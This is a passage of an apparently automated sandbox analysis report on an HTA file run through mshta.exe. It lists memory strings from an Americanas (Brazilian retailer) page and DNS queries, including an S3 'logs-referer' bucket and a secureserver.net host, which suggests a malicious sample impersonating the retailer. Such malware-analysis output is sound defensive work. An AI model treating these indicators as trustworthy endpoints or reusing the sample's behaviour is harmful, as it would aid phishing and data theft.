Source: mshta.exe, 00000000.00000003.25477923652.0000000006ED2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}w3 equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000003.25477923652.0000000006ED2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}w3 equals www.twitter.com (Twitter)
Source: mshta.exe, 00000000.00000003.25477923652.0000000006ED2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}w3 equals www.youtube.com (Youtube)
Source: mshta.exe, 00000000.00000003.25394294677.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484520243.00000000094B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410037652.00000000094B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}w7; equals www.facebook.com (Facebook)
Source: mshta.exe, 00000000.00000003.25394294677.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484520243.00000000094B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410037652.00000000094B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}w7; equals www.twitter.com (Twitter)
Source: mshta.exe, 00000000.00000003.25394294677.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484520243.00000000094B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410037652.00000000094B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"@context":"https://schema.org","@graph":[{"@type":"Organization","address":{"@type":"PostalAddress","addressLocality":"Rio de Janeiro, Brazil","postalCode":"20081-902","streetAddress":"Rua Sacadura Cabral, 130"},"email":"atendimento.acom@americanas.com","id":"#organization","image":{"@id":"#logo"},"legalName":"B2W - Companhia Digital","logo":{"@id":"#logo","@type":"ImageObject","caption":"Americanas","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"name":"Americanas","sameAs":["https://www.facebook.com/americanascom","https://www.youtube.com/user/CanalAmericanas","https://www.instagram.com/americanascom","https://twitter.com/americanascom"],"url":"https://www.americanas.com.br"},{"@id":"#website","@type":"WebSite","name":"Americanas","potentialAction":{"@type":"SearchAction","query-input":"required name=search_term_string","target":"https://www.americanas.com.br/busca?conteudo={search_term_string}"},"publisher":{"@id":"#organization"},"url":"https://www.americanas.com.br"},{"@id":"https://www.americanas.com.br/#webpage","@type":"WebPage","description":"Precisando de iPhone, creatina ou daquela barra de chocolate no meio da tarde? Passou na Americanas, colocou na cestinha, aproveitou as ofertas, comprou!","image":{"@id":"https://www.americanas.com.br/#primaryimage"},"inLanguage":"pt-BR","isPartOf":{"@id":"#website"},"mainEntityOfPage":{"@id":"#website"},"name":"Americanas - Passou, cestou :)","primaryImageOfPage":{"@id":"https://www.americanas.com.br/#primaryimage","@type":"ImageObject","url":"https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-image.png"},"url":"https://www.americanas.com.br"}],"@type":"Schema"}w7; equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: securepubads.g.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: www.americanas.com.br
Source: global trafficDNS traffic detected: DNS query: images-americanas.b2w.io
Source: global trafficDNS traffic detected: DNS query: statics-americanas.b2w.io
Source: global trafficDNS traffic detected: DNS query: logs-referer.s3-sa-east-1.amazonaws.com
Source: global trafficDNS traffic detected: DNS query: s3-sa-east-1.amazonaws.com
Source: global trafficDNS traffic detected: DNS query: 102.57.205.92.host.secureserver.net
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://catalogo-bff-v1-americanas-npf.metaplane.cloud/graphql
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://catalogo-bff-v2-americanas-npf.metaplane.cloud/graphql
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qna-v3-b2w.b2w.iol
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://turbo-v2-americanas-npf.metaplane.cloud/slug/url
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.americanas.com.br/cartao-americanaswindow.__APOLLO_STATE__.ROOT_QUERY.publication(
Source: mshta.exe, 00000000.00000003.25394294677.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403823205.000000000B654000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490021991.000000000B6FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25462978019.000000000B696000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460847777.000000000B657000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25462814221.000000000B6FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444767802.000000000950D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383830981.000000000B6FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000677A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B6FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464408600.0000000009511000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://americanasadvertising.com/?utm_source=site_marcas_americanas&utm_medium=banner&utm_campaign=
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://b2w-region-v1.b2w.io/b2w-region
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401062587.000000000AB51000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377708580.000000000AB13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463326709.000000000AB55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487271254.000000000AB59000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25482925372.0000000006E90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380864273.000000000AB50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377966306.000000000AB45000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378109211.000000000ABA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://canaldedenuncias.com.br/universoamericanas/
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378109211.000000000ABA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377309102.000000000AB99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25432084842.0000000009C17000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377868768.000000000ABA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://carreiras.americanas.com/
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402240267.0000000009499000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://carreiras.americanas.com/rJ
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411479647.0000000009577000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460571625.0000000009578000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463225262.000000000957C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397591598.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395908364.0000000009570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cliente.americanas.com.br/minha
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484145246.0000000009467000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460802201.0000000009466000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://cliente.americanas.com.br/minha-conta/entrar?guest=true&amp;next=https%3A%2F%2Fwww.americana
Source: mshta.exe, 00000000.00000003.25394294677.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484520243.00000000094B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25479338207.0000000002FFE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478770136.0000000002FFE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410037652.00000000094B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/scaffolding/ascgcycc:1080:0
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://customer-v6-americanas.b2w.io/customer/
Source: mshta.exe, 00000000.00000003.25478465499.000000000A9C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487080902.000000000AAF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486409501.000000000A9C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444806712.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460523486.000000000A9C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402958159.000000000AAD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404840319.000000000AAE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377708580.000000000AAF9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://empresas.americanas.com.br/?chave=brd_hm_ft_0_0_empresas
Source: mshta.exe, 00000000.00000003.25462631431.0000000009447000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478465499.000000000A9C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443295751.00000000093E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487832586.000000000ABBB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487080902.000000000AAF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486409501.000000000A9C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444806712.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460523486.000000000A9C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402958159.000000000AAD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25435624253.0000000009C1D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404840319.000000000AAE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://empresas.americanas.com.br/?chave=brd_hm_mn_0_bottom_bndes
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477835168.000000000AC03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484145246.0000000009467000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401685590.000000000ABFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.0000000006766000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 